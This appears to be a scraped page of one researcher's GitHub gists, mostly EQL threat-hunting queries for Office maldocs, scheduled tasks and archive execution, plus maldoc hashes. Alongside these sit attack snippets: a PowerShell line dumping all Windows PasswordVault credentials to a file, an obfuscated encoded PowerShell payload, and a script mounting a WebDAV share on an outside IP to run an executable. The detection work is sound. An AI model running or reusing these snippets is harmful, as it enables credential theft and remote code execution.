Samirbous
Samirbous
/ pwdvault_test
Created
September 23, 2022 18:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] | |
| (new-object Windows.Security.Credentials.PasswordVault).RetrieveAll()|%{$_.RetrievePassword();$_}>"pwds.tmp" |
Samirbous
/ eql hunt recent svc or task
Created
September 7, 2022 14:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| process where event.action == "start" and | |
| ( | |
| (process.parent.name : "svchost.exe" and process.parent.args : "schedule") or | |
| process.parent.name : "services.exe" | |
| ) | |
| and | |
| (process.Ext.relative_file_creation_time < 300 or process.Ext.relative_file_name_modify_time < 300) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "Top 1000 values of process.executable","Top 1000 values of process.command_line","Top 1000 values of process.working_directory","Count of records" | |
| "C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\ .com"" ""Program Files (x86)""","C:\Users\user\Desktop\",6 | |
| "C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\ .com"" ""Windows""","C:\Users\user\Desktop\",8 | |
| "C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\ .com"" ""ProgramData""","C:\Users\user\Desktop\",6 | |
| "C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\ .com"" ""Recovery""","C:\Users\user\Desktop\",7 | |
| "C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\ .com"" ""Documents and Settings""","C:\Users\user\Desktop\",11 | |
| "C:\Windows\System32\rundll32.exe |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $iWli=('011K110,01110101,01101110,011K011,011101K,01101K1,01101111,01101110,K1KK0,011101K,01K1101,01KK11,011K110,01101011,0101K11,01K01K,K1KK0,01111011,KK1101,KK1010,KK1101,KK1010,KK1K1,01011011,01KK11,01101101,011K1K,011011K,011K101,011101K,01KK10,01101K1,01101110,011K1K,01101K1,01101110,011K111,K101K0,K101K1,01011101,KK1101,KK1010,K1KK0,K1KK0,K1KK0,K1KK0,0101KK,011KK1,0111K10,011KK1,01101101,K1KK0,K101K0,01011011,011K010,01111K1,011101K,011K101,01011011,01011101,01011101,K1KK0,K1K1K,011K010,01111K1,011101K,011K101,01KK01,0111K10,0111K10,011KK1,01111K1,K101K1,KK1101,KK1010,K1KK0,KK1101,KK1010,KK1K1,0101KK,0111K10,01101111,011K011,011K101,0111K11,0111K11,K1KK0,01111011,KK1101,KK1010,KK1K1,K1KK0,K1KK0,K1KK0,K1KK0,K1K1K,011K111,01101011,011K1K,011K110,K111101,K101K0,K1K111,K101K0,01011011,01K1K1,01K1111,K101110,01KK11,01101111,01101101,0111KK,0111K10,011K101,0111K11,0111K11,01101K1,01101111,01101110,K101110,01KK11,01101111,01101101,0111KK,0111K10,011K101,0111K11,0111K11,01101K1,01101111,01101110,01K1101,0110111 |
Samirbous
/ gist:2e9a84f56bd6e7ee2da2da2e743f65cf
Created
July 30, 2022 19:41
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sequence with maxspan=1m | |
| [file where event.action != "deletion" and | |
| file.extension : "doc*" and | |
| /* xml or mht file header renamed as doc smuggling maldoc */ | |
| file.Ext.header_bytes : ("3c3f786d6c2076657273696f6e*", "4d494d452d56657273696f6e3a*") and | |
| process.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSACCESS.EXE")] by process.entity_id | |
| [process where event.action == "start" and | |
| process.parent.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSACCESS.EXE")] by process.parent.entity_id |
Samirbous
/ suspicious office child http cache
Created
June 2, 2022 21:34
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sequence with maxspan=30s | |
| [registry where process.name : "winword.exe" and | |
| registry.path : "HKEY_USERS\\*\\Software\\Microsoft\\Office\\*\\Common\\Internet\\Server Cache\\https*"] by process.entity_id | |
| [file where event.action == "creation" and | |
| file.path : "?:\\Users\\*\\AppData\\*\\Content.MSO\\*" and process.name : "winword.exe" and | |
| file.extension : "htm*" and file.size >= 4096] by process.entity_id | |
| [process where event.action == "start" and process.parent.name : "winword.exe" and | |
| not process.name : ("splwow64.exe", "DWWIN.EXE", "WerFault.exe")] by process.parent.entity_id |
Samirbous
/ 85829b792aa3a5768de66beacdb0a0ce
Created
June 1, 2022 17:40
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $cmd="C:\windows\system32\cmd.exe"; | |
| Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe"; | |
| Start-Process $cmd -windowstyle hidden -ArgumentList "/c net use z: \\5.206.224.233\webdav\ /user:user | |
| `$RFVbgtyuJ32D && z:\osdupdate.exe && net use z: /delete "; |
Samirbous
/ dir traversal office
Created
May 31, 2022 15:05
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| process where event.type in ("start", "process_started") and | |
| process.parent.name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe") and | |
| /* u can add other dir traversal patterns here */ | |
| process.command_line : ("*../../../..*", "*..\\..\\..\\..*", "*..//..//..//..*") and | |
| process.executable : ("?:\\windows\\system32\\*.exe", "?:\\Windows\\SysWOW64\\*.exe") |
Samirbous
/ maldoc hashes
Created
May 28, 2022 17:00
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 76f7247dcb2f7dfb50a21eb9fe35a55a | |
| fea98f3eb09ddfc5686d45c91ed887fd | |
| d3b8822c5107aaeb1704dcdea673eeb0 | |
| d4d738c7d917261c6b504de932fc36ec | |
| d0ee5895a471bdeafcb5a1d759ff3879 | |
| 759e2d7e3820770f2ed1e95f4207242f | |
| e641c2fb4b71b12e4f7abae53d89a5a8 | |
| 9bf5a424d33fc007310d18255e053986 | |
| e3ca32ebe9b538cd74bafeb6aa0440f5 | |
| 2ce0a4bc8db0f54d6b0b8d681f42bb5b |
Samirbous
/ EQL - exec from pwd protected archive
Created
May 9, 2022 20:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sequence by host.id with maxspan=1m | |
| [process where process.name : ("7zG.exe", "WinRAR.exe") and not process.args : "a"] by process.pid | |
| [registry where process.name : ("7zG.exe", "WinRAR.exe") and registry.value : "ShowPassword" and registry.data.strings : "0"] by process.pid | |
| [process where event.action == "start" and process.parent.name : ("7zG.exe", "WinRAR.exe")] by process.parent.pid |